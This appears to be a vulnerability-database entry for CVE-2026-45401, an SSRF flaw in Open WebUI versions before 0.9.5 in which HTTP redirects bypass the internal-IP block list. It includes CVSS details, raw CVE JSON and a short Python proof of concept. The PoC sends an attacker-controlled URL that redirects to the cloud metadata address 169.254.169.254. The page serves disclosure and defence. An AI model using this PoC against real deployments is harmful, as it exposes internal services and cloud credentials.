Security Vulnerability Report
中文
CVE-2026-45401 CVSS 8.5 HIGH

CVE-2026-45401

Published: 2026-05-15 21:16:38
Last Modified: 2026-05-15 21:16:38
Source: [email protected]

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the validate_url() function in backend/open_webui/retrieval/web/utils.py only validates the initial URL submitted by the caller. The HTTP clients used downstream (sync requests, async aiohttp, langchain's WebBaseLoader) follow HTTP 3xx redirects by default and do not re-validate the redirect target against the private-IP / metadata-IP block list. Any authenticated user can therefore submit a public URL that 302-redirects to an internal address (e.g. 127.0.0.1, 169.254.169.254, RFC1918) and read the internal response body via the /api/v1/retrieval/process/web endpoint, the /api/v1/images/... endpoints, the /api/chat/completions endpoint with an image_url content part, and any other route that calls these helpers. This vulnerability is fixed in 0.9.5.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.9.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit PoC for CVE-2026-45401 # Attacker controls 'http://attacker.com' which returns 302 to http://169.254.169.254 target_url = "http://localhost:8080/api/v1/retrieval/process/web" malicious_url = "http://attacker.com/redirect-to-internal" payload = { "url": malicious_url } # Send request to vulnerable Open WebUI instance response = requests.post(target_url, json=payload) print(f"Status Code: {response.status_code}") print("Response Body (Internal Data):") print(response.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45401", "sourceIdentifier": "[email protected]", "published": "2026-05-15T21:16:38.140", "lastModified": "2026-05-15T21:16:38.140", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the validate_url() function in backend/open_webui/retrieval/web/utils.py only validates the initial URL submitted by the caller. The HTTP clients used downstream (sync requests, async aiohttp, langchain's WebBaseLoader) follow HTTP 3xx redirects by default and do not re-validate the redirect target against the private-IP / metadata-IP block list. Any authenticated user can therefore submit a public URL that 302-redirects to an internal address (e.g. 127.0.0.1, 169.254.169.254, RFC1918) and read the internal response body via the /api/v1/retrieval/process/web endpoint, the /api/v1/images/... endpoints, the /api/chat/completions endpoint with an image_url content part, and any other route that calls these helpers. This vulnerability is fixed in 0.9.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-rh5x-h6pp-cjj6", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.